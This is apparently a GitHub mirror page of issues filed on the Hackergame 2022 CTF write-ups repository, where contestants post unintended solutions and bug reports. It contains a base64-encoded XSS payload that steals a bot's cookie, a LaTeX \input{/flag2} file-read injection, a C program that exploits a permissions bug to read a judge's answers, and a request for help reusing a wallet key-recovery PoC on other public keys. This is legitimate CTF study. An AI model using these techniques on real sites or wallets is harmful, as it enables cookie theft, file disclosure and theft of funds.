ustc-hackergame / hackergame2022-writeups Goto Github PK
View Code? Open in Web Editor NEWHackergame 2022 的官方与非官方题解
License: Other
Hackergame 2022 的官方与非官方题解
License: Other
出题人在打包 docker image 时把 data/
目录用 COPY 加入了 image 中,并且设置目录拥有者为 judger,目录的权限是 766。
在 online_judge.py
中预期使用 os.makedir()
来设置 data
目录的权限为 700,但是 os.makedir()
不改变已存在的目录的权限,见 python 3.11 文档 os.makedirs。所以 runner 用户可以读取 data
中的内容。
而 static.out
是其他用户可读的。所以有下面的非预期解。
#include <stdio.h>
#include <stdlib.h>
// static_data_path
char *sdata_input_path = "./data/static.in";
char *sdata_output_path = "./data/static.out";
const int LEN = 2048;
int main() {
char *lines[2];
size_t ns[2];
FILE *fp = fopen(sdata_output_path, "r");
if (fp == NULL) {
printf("failed to read static output");
exit(1);
}
// read and show the 2 prime numbers.
getline(&lines[0], &ns[0], fp);
printf("%s", lines[0]);
getline(&lines[1], &ns[0], fp);
printf("%s", lines[1]);
free(lines[0]);
free(lines[1]);
fclose(fp);
return 0;
}
直接alert(document.cookie)
selenium就把flag打出来了。
Please submit your quiz URL:
> http://202.38.93.111:10056/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
Your URL converted to http://web/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
I am using Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.119 Safari/537.36
- Logining...
Putting secret flag...
- Now browsing your quiz result...
ERROR <class 'selenium.common.exceptions.UnexpectedAlertPresentException'>
selenium.common.exceptions.UnexpectedAlertPresentException: Alert Text: flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}
Message: unexpected alert open: {Alert text : flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}}
(Session info: headless chrome=106.0.5249.119)
Stacktrace:
#0 0x55be02e75d53 <unknown>
#1 0x55be02c62786 <unknown>
#2 0x55be02cd6636 <unknown>
0xffffffffffffffffffffffffffffffff
是一个解,因为这玩意 crc128
出来就是它本身,并且这是一个 des
弱密钥...顺手一试就试出来了
macOS里写的exif版本是2.3.1,多了一个点……
到底哪个才是对的呢
Hi all, any body help me?
My question is how to use method
secp256k1_sqr_mont(BN_ULONG res[P256_LIMBS], const BN_ULONG a[P256_LIMBS])
from https://github.com/piggypiggy/secp256k1-x64
the poc code for https://github.com/USTC-Hackergame/hackergame2022-writeups/tree/master/official/%E5%B0%8F%20Z%20%E7%9A%84%E9%9D%93%E5%8F%B7%E9%92%B1%E5%8C%85
this POC only work for this public key
0x04a362925f16b3f45e7048b376dfd54beedee8defc8ea0804823c489f3cf5862f13e89da68fa280f0812ef2d339d95352bd97c03ccf0a6304a1aa004b6557ddd4b
i tried using other (profanity) public key not working, any idea?
i have CTF challange to solve using this POC pls
rclone有个command verb叫rclone reveal
开发者也没想到有人需要去爬Go源码解密这个
文档里也说了是防备 Eyedropping
的
In the Python file code.py the qc.measure_all()
call creates a new classical register and does not use the one already provided during initialization via QuantumCircuit(129,128)
.
I demonstrate the issue at a smaller scale, becasue I cannot simulate such a large circuit, but the issue is even more important when the register allocated are bigger. Run the following code in the Python file:
from qiskit import QuantumCircuit, Aer
circuit = QuantumCircuit(5, 5)
circuit.x(0)
circuit.x(4)
circuit.measure_all() # <-- this will create a new classical register
sim = Aer.get_backend('qasm_simulator')
counts = sim.run(circuit).result().get_counts()
print(counts) # <-- you can see the output here
The output will be {'10001 00000': 1024}
. There are double the number of bits in the output, because the classical register is not used.
I would have expected to use the classical register already provided during initialization.
What about using the add_bits=False
flag in the measure_all
method to reuse the existing classical register? Here is the suggested version:
qc.measure_all(add_bits=False)
Thanks in advance, I wish you a happy and productive day.
Try this:
$$
\begingroup
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{/flag2}
\endgroup
$$
Really not worth making a PR for this...
This is mentioned in a group chat
On the page http://202.38.93.111:18000/ , open console and call functions from the script will automatically gives correct flag:
And will trigger the page to reload and give these results:
The reason behind this is about how js
handle undefined
, in functionchange(value)
we have:
function change(value) {
range[1] = Math.round(parseFloat(value) * 1000000)
document.getElementById('submit').disabled = !(range[1] >= 0 && range[1] <= 1000000)
}
Here, calling parseFloat(undefined)
will return NaN
instead of triggering an error:
And by accident(kind of?), Javascript and Java share the identical naming for NaN
, the POST
payload triggered is shown as:
Thus giving the correct flag.
应为 src/getflag.hei.py
不好意思单独为这个问题开 PR,所以提 issues 了
create a tampermonkey script and enable it.
// default settings...
// ...
// @match http://202.38.93.111:10047/xcaptcha
// ...
(function() {
'use strict';
// Your code here...
let btn = document.getElementById("submit")
// calsulate the first one
let nums = document.querySelector("body > div > form > div:nth-child(1) > label").innerHTML.split(" ")[0].split("+")
let sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
document.querySelector("#captcha1").value=sum
// second
nums = document.querySelector("body > div > form > div:nth-child(2) > label").innerHTML.split(" ")[0].split("+")
sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
document.querySelector("#captcha2").value=sum
// third
nums = document.querySelector("body > div > form > div:nth-child(3) > label").innerHTML.split(" ")[0].split("+")
sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
document.querySelector("#captcha3").value=sum
btn.click()
})();
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.